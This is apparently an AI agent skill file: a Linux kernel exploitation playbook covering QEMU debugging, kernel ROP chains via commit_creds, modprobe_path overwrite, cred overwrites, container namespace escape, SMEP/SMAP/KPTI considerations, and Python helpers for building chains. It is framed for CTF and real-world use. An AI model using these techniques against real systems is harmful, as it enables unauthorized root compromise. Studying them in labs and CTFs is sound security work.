---
name: kernel-exploitation
description: >-
  Linux kernel exploitation playbook. Use when exploiting kernel vulnerabilities (UAF, OOB, race condition, type confusion) for privilege escalation via commit_creds, modprobe_path overwrite, or kernel ROP chains in CTF and real-world scenarios.
---

# SKILL: Linux Kernel Exploitation — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI.

## 0. RELATED ROUTING

- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — userspace protections (NX, ASLR) also apply in kernel context
- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — kernel ROP reuses many userspace ROP concepts
- [heap-exploitation](../heap-exploitation/SKILL.md) — kernel SLUB is conceptually related to userspace heap
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) — non-exploit kernel privesc techniques

### Advanced References

- [KERNEL_MITIGATION_BYPASS.md](./KERNEL_MITIGATION_BYPASS.md) — KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques
- [KERNEL_HEAP_TECHNIQUES.md](./KERNEL_HEAP_TECHNIQUES.md) — SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation

---

## 1. EXPLOITATION MODEL

```
┌─────────────────────────────────────────────────────┐
│  1. Find Vulnerability                              │
│     (UAF, OOB, race, integer overflow, type confusion)│
├─────────────────────────────────────────────────────┤
│  2. Build Primitive                                 │
│     (arbitrary read, arbitrary write, controlled RIP)│
├─────────────────────────────────────────────────────┤
│  3. Bypass Mitigations                              │
│     (KASLR, SMEP, SMAP, KPTI)                     │
├─────────────────────────────────────────────────────┤
│  4. Escalate Privileges                             │
│     (commit_creds, modprobe_path, namespace escape)  │
├─────────────────────────────────────────────────────┤
│  5. Return to Userspace Cleanly                     │
│     (KPTI trampoline, iretq/sysretq, swapgs)       │
└─────────────────────────────────────────────────────┘
```

---

## 2. ENVIRONMENT SETUP

### QEMU + Custom Kernel

```bash
# Download and compile kernel
wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz
tar xf linux-6.1.tar.xz && cd linux-6.1
make defconfig
# Disable mitigations for easier debugging:
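scripts/config --disable RANDOMIZE_BASE      # KASLR
# FG-KASLR (CONFIG_FG_KASLR) is an out-of-tree patch set; mainline 6.1 has no option for it
# Since v5.18, DEBUG_INFO is selected through the DWARF choice below
scripts/config --disable DEBUG_INFO_NONE --enable DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
make olddefconfig                            # resolve dependencies of the edited .config
make -j$(nproc)                              # builds vmlinux and arch/x86/boot/bzImage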

# Boot with QEMU
# -s: GDB server on :1234; -S: pause at start until GDB continues
qemu-system-x86_64 \
  -kernel bzImage \
  -initrd rootfs.cpio.gz \
  -append "console=ttyS0 nokaslr quiet" \
  -nographic \
  -s -S \
  -monitor /dev/null \
  -m 256M \
  -cpu kvm64,+smep,+smap
```

### GDB Debugging

```bash
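gdb vmlinux                 # a vmlinux built with debug info already carries symbols
# Inside GDB:
target remote :1234
# Only needed when symbols come from a separate file or the kernel was relocated:
add-symbol-file vmlinux 0xffffffff81000000  # default x86-64 .text base (nokaslr)
# Breakpoints
b commit_creds
b *0xffffffff81234567       # placeholder address
# pwndbg/GEF work with kernel debugging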
```

### initramfs Modification

```bash
mkdir rootfs && cd rootfs
zcat ../rootfs.cpio.gz | cpio -idmv   # the archive is gzip-compressed, so decompress first
# Edit init script, add exploit binary
cp /path/to/exploit ./
# Repack
find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz
```

---

## 3. COMMON VULNERABILITY TYPES

| Type | Description | Kernel Example |
|---|---|---|
| UAF | Object freed but pointer still accessible | CVE-2022-32250 (nf_tables) |
| OOB Read/Write | Array index or size check missing | CVE-2021-22555 (Netfilter) |
| Race Condition | TOCTOU between check and use | CVE-2016-5195 (DirtyCow) |
| Integer Overflow | Size calculation wraps around | Various ioctl handlers |
| Type Confusion | Object cast to wrong type | CVE-2022-34918 (nf_tables) |
| Double Free | Object freed twice | SLUB allocator exploitation |
| Stack Overflow | Kernel stack buffer overflow | Rare (kernel stack is small: 8KB–16KB) |

---

## 4. PRIVILEGE ESCALATION TARGETS

### Method 1: commit_creds(prepare_kernel_cred(0))

```c
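// Kernel functions; addresses come from /proc/kallsyms or a KASLR leak
int (*commit_creds)(void *) = (void *)COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = (void *)PREPARE_KERNEL_CRED_ADDR;
commit_creds(prepare_kernel_cred(0));  // fresh cred copied from init_cred (uid=0, gid=0)
// Kernels >= 6.2: prepare_kernel_cred(NULL) returns NULL; use commit_creds(&init_cred) instead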
```

Kernel ROP chain equivalent:
```
pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) returns a copy of init_cred (kernels < 6.2 only)
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace
```
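
The chain above can be laid out offline before it is embedded in an exploit. The following is a minimal sketch, not a definitive implementation: every offset in `OFFSETS` is a made-up placeholder (real values come from the target `vmlinux`), and `build_cred_chain` and `pack_chain` are hypothetical helper names. It only shows the stack order and the little-endian packing; the return-to-userspace tail is left out.

```python
import struct

# Hypothetical offsets from the kernel text base. These are placeholders,
# not values from any real build.
OFFSETS = {
    "pop_rdi_ret": 0x001518,
    "prepare_kernel_cred": 0x0C1A00,
    "mov_rdi_rax_ret": 0x4D2F00,
    "commit_creds": 0x0C1700,
}

def build_cred_chain(kernel_base, offsets=OFFSETS):
    """Return the chain as a list of 64-bit values in stack order."""
    def addr(name):
        return kernel_base + offsets[name]
    return [
        addr("pop_rdi_ret"), 0,          # rdi = NULL
        addr("prepare_kernel_cred"),     # rax = new cred
        addr("mov_rdi_rax_ret"),         # rdi = rax
        addr("commit_creds"),
    ]

def pack_chain(chain):
    """Serialize the chain as little-endian qwords."""
    return b"".join(struct.pack("<Q", value) for value in chain)
```

Keeping the chain as a list of integers until the last step makes it easy to rebase when the KASLR slide changes between runs.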

### Method 2: modprobe_path Overwrite

```c
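// modprobe_path = "/sbin/modprobe" in kernel .data (writable, KMOD_PATH_LEN = 256 bytes)
// Overwrite to "/tmp/x" → execute a file with an unknown binary format → kernel runs /tmp/x as root
// Requires CONFIG_STATIC_USERMODEHELPER to be disabled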
```

```bash
# Setup:
echo '#!/bin/sh' > /tmp/x
echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x
chmod +x /tmp/x
# Trigger (unknown binary format):
echo -ne '\xff\xff\xff\xff' > /tmp/dummy
chmod +x /tmp/dummy
/tmp/dummy  # kernel calls modprobe_path → /tmp/x runs as root
```
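
Many write primitives store one 64-bit value at a time, so the replacement path usually has to be split into qwords first. The sketch below assumes such an 8-byte primitive; `path_to_qwords` is a hypothetical helper name, and the only kernel fact it relies on is the 256-byte size of the `modprobe_path` buffer.

```python
import struct

KMOD_PATH_LEN = 256  # size of the kernel's modprobe_path buffer

def path_to_qwords(path):
    """Split a NUL-terminated path into little-endian 64-bit values."""
    raw = path.encode() + b"\x00"
    if len(raw) > KMOD_PATH_LEN:
        raise ValueError("path does not fit in modprobe_path")
    raw += b"\x00" * (-len(raw) % 8)  # pad to a multiple of 8 bytes
    return [struct.unpack_from("<Q", raw, i)[0] for i in range(0, len(raw), 8)]
```

A short path such as `/tmp/x` fits in a single qword, which is why it is a popular choice when the primitive is limited to one write.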

### Method 3: cred Structure Direct Overwrite

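If you have an arbitrary write and can locate the current task's `cred` pointer, zero every ID field in the cred structure: `uid`, `gid`, `suid`, `sgid`, `euid`, `egid`, `fsuid`, and `fsgid`. Permission checks use the effective and filesystem IDs, so zeroing only `uid`/`gid` is not enough.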
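
The write list for this method is small enough to compute by hand, but a sketch makes the layout explicit. It assumes the eight 32-bit ID fields sit contiguously right after the `usage` refcount; `ids_offset=4` is an assumption that holds only for some kernel versions and configs, so it must be checked against the target's `struct cred`. `cred_id_writes` is a hypothetical helper name.

```python
# Order of the ID fields in struct cred
ID_FIELDS = ("uid", "gid", "suid", "sgid", "euid", "egid", "fsuid", "fsgid")

def cred_id_writes(cred_addr, ids_offset=4):
    """List (address, 32-bit value) pairs that zero every ID field.

    ids_offset is an assumption: the size of the refcount (and any debug
    fields after it) depends on kernel version and configuration.
    """
    return [(cred_addr + ids_offset + 4 * i, 0) for i in range(len(ID_FIELDS))]
```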

### Method 4: Namespace Escape (Containers)

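Point the compromised task's `nsproxy` at `init_nsproxy` (for example by calling `switch_task_namespaces(task, &init_nsproxy)`), or otherwise manipulate its namespace pointers, to escape container isolation.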

---

## 5. KERNEL ROP

### Controlled RIP Sources

| Source | Mechanism |
|---|---|
| Corrupted function pointer | UAF object has vtable-like dispatch → overwrite pointer |
| Corrupted return address | Kernel stack overflow (rare) |
| Corrupted `ops` structure | Module operations struct (file_operations, seq_operations) |

### seq_operations Hijack (Common CTF Pattern)

```c
struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int (*show)(struct seq_file *, void *);
};
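// Size: 0x20 → kmalloc-32 (kmalloc-cg-32 on kernels >= 5.14, because single_open() allocates with GFP_KERNEL_ACCOUNT)
// open("/proc/self/stat") → single_open() allocates a seq_operations
// UAF overwrite of start → controlled RIP when read() is called on that fd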
```
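
Matching a victim object to a spray object starts with knowing which general-purpose cache each one lands in. The sketch below assumes the default x86-64 SLUB size classes and ignores features such as randomized kmalloc caches; `kmalloc_cache` is a hypothetical helper name.

```python
# Default general-purpose kmalloc size classes on x86-64 (assumption)
KMALLOC_SIZES = (8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192)

def kmalloc_cache(size, accounted=False):
    """Return the name of the smallest general cache that fits `size`."""
    for cache_size in KMALLOC_SIZES:
        if size <= cache_size:
            prefix = "kmalloc-cg-" if accounted else "kmalloc-"
            label = f"{cache_size // 1024}k" if cache_size >= 1024 else str(cache_size)
            return prefix + label
    raise ValueError("larger than the biggest general-purpose cache")
```

For `seq_operations`, `kmalloc_cache(0x20)` gives the cache named in the comment above, and `accounted=True` gives its `GFP_KERNEL_ACCOUNT` counterpart.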

### Stack Pivoting in Kernel

| Gadget | Usage |
|---|---|
| `xchg eax, esp; ret` | Pivot to address in lower 32 bits of RAX (mmap buffer at known addr) |
| `mov rsp, [rdi+X]; ...` | If RDI points to controlled data |
| `push rdi; pop rsp; ...` | Pivot to RDI (first arg of hijacked function) |

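**Important**: With SMEP enabled, the kernel cannot execute userspace pages, so the ROP chain must use **kernel gadgets** only. With SMAP also enabled, the chain itself must live in kernel memory, so pivoting to a userspace mmap buffer (the `xchg eax, esp` case) no longer works.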
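
For the `xchg eax, esp; ret` row, the address to map follows directly from the value RAX holds when the gadget runs: a 32-bit register write zero-extends into the full 64-bit register. A minimal sketch of that arithmetic, assuming 4 KiB pages and a kernel without SMAP (`xchg_pivot_target` is a hypothetical helper name):

```python
PAGE_SIZE = 0x1000

def xchg_pivot_target(rax):
    """Return (new_rsp, mmap_base) for an `xchg eax, esp; ret` pivot."""
    new_rsp = rax & 0xFFFFFFFF             # 32-bit write zero-extends into RSP
    mmap_base = new_rsp & ~(PAGE_SIZE - 1)  # page containing the new stack top
    return new_rsp, mmap_base
```

In practice the mapping should extend a few pages on both sides of `new_rsp`, since functions called from the chain push below the pivot address.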

---

## 6. ret2usr (Pre-SMEP)

Directly call a userspace function from kernel context:

```c
void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory
```

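**Blocked by**: SMEP (Supervisor Mode Execution Prevention), which stops the kernel from executing user-mapped pages. KPTI has the same effect even without SMEP, because userspace is mapped non-executable in the kernel page tables.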

---

## 7. RETURNING TO USERSPACE

After escalating privileges in kernel context, execution must return cleanly to userspace to spawn a root shell.

### Via iretq (Traditional)

```nasm
; ROP chain ending:
swapgs                     ; swap GS base back to userspace
iretq                      ; pops: RIP, CS, RFLAGS, RSP, SS from stack
; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]
```

```python
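# Save userspace state before entering the kernel
user_cs = 0x33      # 64-bit user code segment selector
user_ss = 0x2b      # user stack segment selector
user_rflags = None  # placeholder: value saved via pushfq before the exploit
user_rsp = None     # placeholder: saved RSP
user_rip = None     # placeholder: address of the post-exploit function (e.g., get_shell)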
```
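
The five saved values form the frame that `iretq` pops, in exactly the order listed in the stack comment above. A small sketch of the packing, with `iretq_frame` as a hypothetical helper name and the selector values taken from the block above:

```python
import struct

USER_CS = 0x33  # 64-bit user code segment selector
USER_SS = 0x2B  # user stack segment selector

def iretq_frame(user_rip, user_rflags, user_rsp):
    """Pack the five qwords iretq pops, lowest stack address first."""
    return struct.pack("<5Q", user_rip, USER_CS, user_rflags, user_rsp, USER_SS)
```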

### Via KPTI Trampoline (When KPTI Enabled)

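KPTI gives the kernel and userspace separate page tables. A bare `swapgs; iretq` returns to user mode with CR3 still pointing at the kernel page tables, where userspace pages are mapped non-executable, so the first user instruction faults with SIGSEGV. Use the kernel's own return trampoline, which switches CR3 before `iretq`:

```
# KPTI trampoline (in kernel at known offset):
# swapgs_restore_regs_and_return_to_usermode:
#   ... (register pops; skip them by entering at the mov below)
#   mov rdi, rsp
#   ...
#   switch CR3 to the user page tables
#   swapgs
#   iretq
# Enter at the `mov rdi, rsp` (the offset is build-specific, commonly +22) with
# [pad, pad, RIP, CS, RFLAGS, RSP, SS] on the stack; the two pads are consumed by pops before iretq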
```
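
The tail of a chain that returns through the trampoline can be sketched as below. This is an illustration under stated assumptions: `sym_offset` and `entry_skip` are build-specific values that must be read from the target kernel's disassembly, the two zero qwords stand for the values popped on the way to `iretq` in commonly analysed builds, and `kpti_return_tail` is a hypothetical helper name. `frame` is an already packed 40-byte `iretq` frame.

```python
import struct

def kpti_return_tail(kernel_base, sym_offset, entry_skip, frame):
    """Pack [trampoline entry, pad, pad] followed by a packed iretq frame."""
    if len(frame) != 40:
        raise ValueError("iretq frame must be five qwords")
    entry = kernel_base + sym_offset + entry_skip
    return struct.pack("<3Q", entry, 0, 0) + frame
```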

### Via signal Handler Return

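Register a `SIGSEGV` handler before the exploit. With KPTI enabled, a plain `swapgs; iretq` return faults on the first user instruction; the kernel delivers that fault as `SIGSEGV` through its normal return path, so the handler runs in userspace with the credentials installed by `commit_creds`. This avoids the KPTI trampoline, not the `swapgs`/`iretq` sequence itself.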

---

## 8. QEMU DEBUGGING TIPS

| Command | Purpose |
|---|---|
| `-s -S` | GDB server on :1234, paused |
| `-monitor /dev/null` | Disable QEMU monitor (cleaner output) |
| `-append "nokaslr"` | Disable KASLR for debugging |
| `-cpu kvm64,+smep,+smap` | Enable specific CPU features |
| `info registers` (GDB) | Show all register values |
| `maintenance packet Qqemu.PhyMemMode:1` | Read physical memory in GDB |
| `cat /proc/kallsyms` | Kernel symbol addresses (if readable) |
| `cat /sys/kernel/notes` | Kernel build ID |
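
When `/proc/kallsyms` is readable, the KASLR slide can be derived from it directly. The sketch below parses kallsyms-style text and compares `_text` with the default x86-64 base used elsewhere in this document; `parse_kallsyms` and `kaslr_slide` are hypothetical helper names. If `kptr_restrict` hides addresses, every entry reads as zero and the result is meaningless.

```python
DEFAULT_TEXT_BASE = 0xFFFFFFFF81000000  # x86-64 text base when KASLR is off

def parse_kallsyms(text):
    """Map symbol name -> address from /proc/kallsyms-style lines."""
    symbols = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            # Keep the first occurrence of a duplicated name
            symbols.setdefault(parts[2], int(parts[0], 16))
    return symbols

def kaslr_slide(symbols):
    """Offset of the running kernel's _text from the default base."""
    return symbols["_text"] - DEFAULT_TEXT_BASE
```

Adding the slide to an offset taken from a `nokaslr` debugging session gives the runtime address of the same symbol, provided function-granular randomization is not in use.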

---

## 9. DECISION TREE

```
Kernel vulnerability identified
├── What type?
│   ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES)
│   ├── OOB → determine read/write range, target adjacent objects
│   ├── Race condition → reliable trigger (userfaultfd, FUSE; unprivileged userfaultfd is off by default since 5.11)
│   ├── Integer overflow → how does it translate to OOB or allocation confusion?
│   └── Type confusion → what can the confused type access?
│
├── Build primitive
│   ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP)
│   ├── Arbitrary read? → leak KASLR base, then controlled RIP
│   ├── Arbitrary write? → modprobe_path overwrite (simplest)
│   │                      or overwrite cred structure directly
│   └── Limited write? → target function pointer in known object
│
├── Mitigations (see KERNEL_MITIGATION_BYPASS.md)
│   ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read)
│   ├── SMEP → kernel ROP only (no user code exec)
│   ├── SMAP → kernel cannot dereference user pointers directly (keep ROP chain and fake objects in kernel memory, or use a copy_from_user gadget)
│   ├── KPTI → use KPTI trampoline for clean return
│   └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path)
│
├── Escalation method
│   ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds
│   ├── Have arbitrary write + known modprobe_path address → modprobe_path overwrite
│   ├── Have arbitrary write + KASLR bypass → overwrite cred uid/gid to 0
│   └── Have controlled function call → call commit_creds(prepare_kernel_cred(0))
│
└── Return to userspace
    ├── KPTI disabled → swapgs; iretq (ROP ending)
    ├── KPTI enabled → jump to KPTI trampoline
    └── Alternative → signal handler + process_one_work return path
```